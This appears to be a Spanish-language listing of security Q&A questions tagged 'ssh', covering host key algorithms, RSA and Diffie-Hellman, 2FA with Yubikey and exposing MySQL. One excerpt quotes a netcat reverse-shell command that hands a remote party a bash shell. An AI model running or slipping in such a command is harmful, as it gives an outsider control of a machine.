Preguntas con etiqueta 'ssh'

2
respuestas

¿Qué papel juega la sincronización del reloj en la comunicación SSL?

Recientemente hemos implementado la seguridad de WS Trust sobre SSL para las comunicaciones de nuestros clientes / servidores. Nuestra aplicación es utilizada por miles de nuestros clientes, repartidos por todo el mundo. Uno de los problemas que...
hecha 13.11.2014 - 17:51
3
respuestas

¿Cómo puedo hacer que SSH me solicite la clave RSA en lugar de la clave ECDSA?

Estoy tratando de SSH en mi nuevo servidor Ubuntu 12.04. En el cliente he eliminado conocido_hosts. SSH al host por primera vez me ofrece una clave ECDSA para verificar. El problema es que sé cómo obtener la clave RSA y verificarla, pero no sé c...
hecha 07.05.2012 - 14:33
3
respuestas

¿cómo se comporta la shell inversa?

Alguien me estaba ayudando con un problema en mi servidor vagrant. Pudo acceder al shell a través de (lo ejecuté para él, con su ip y puerto): nc <ip> -e /bin/bash <port> Nunca he encontrado esto antes, pero me pareció muy inter...
hecha 11.02.2016 - 23:01
1
respuesta

¿Cómo utiliza SSH tanto RSA como Diffie-Hellman?

El protocolo SSH 2 le permite usar las claves DSA, ECDSA, ED25519 y RSA al establecer una conexión segura a un servidor. (Tenga en cuenta para esta pregunta que solo estoy familiarizado con el procedimiento y las capacidades de RSA y no puedo h...
hecha 26.12.2014 - 17:33
2
respuestas

entendiendo el paso "Ofrecer una clave pública RSA" durante la inicialización de la conexión SSH

Durante la inicialización de la conexión SSHv2, hay un siguiente mensaje de depuración: debug1: Offering RSA public key: /home/user/.ssh/id_rsa ¿Estoy en lo cierto al decir que en realidad no se envía una clave pública al servidor? Además,...
hecha 28.02.2017 - 15:56
2
respuestas

¿No es seguro abrir el puerto de MySQL a Internet?

El consenso sobre esto La pregunta sobre la falla del servidor parece ser que abrir el puerto 3306 para MySQL es más peligroso que usar un túnel SSH para acceder a MySQL. Creo que con credenciales sólidas se podría mantener seguro a MySQL,...
hecha 24.07.2014 - 22:55
3
respuestas

¿Qué algoritmo de clave de host es mejor usar para SSH?

Cuando se conecta por primera vez a un servidor SSH que no está contenido dentro de su archivo known_hosts , su cliente SSH muestra la huella digital de la clave pública que proporcionó el servidor. Encontré de esta pregunta aquí que com...
hecha 25.07.2016 - 23:25
2
respuestas

¿Autenticación de dos factores con autenticación de clave ssh y yubikey?

OpenSSH no invocará PAM en absoluto si la clave pública (RSA) La autenticación está configurada y el cliente presenta una clave válida. Por lo tanto, si usa autenticación basada en clave, no puede aplicar 2FA fácilmente. Una solución para est...
hecha 12.04.2013 - 18:32
7
respuestas

¿Por qué se puede forzar bruscamente una clave privada cifrada?

Cuando se usan claves SSH para autenticar a un servidor para acceso remoto, ¿por qué es posible diseñar la clave verdadera y, por lo tanto, la frase de contraseña de una clave privada encriptada, sin verificar cada conjetura de la frase de contr...
hecha 11.04.2011 - 18:14
2
respuestas

¿Es seguro transferir una clave pública RSA por correo electrónico?

He configurado mi servidor VPS'ssh para que acepte solo la identificación basada en clave: deshabilité la conexión basada en contraseña. Como consecuencia, me estoy conectando desde casa con una clave RSA generada antes de deshabilitar la con...
hecha 24.02.2013 - 22:37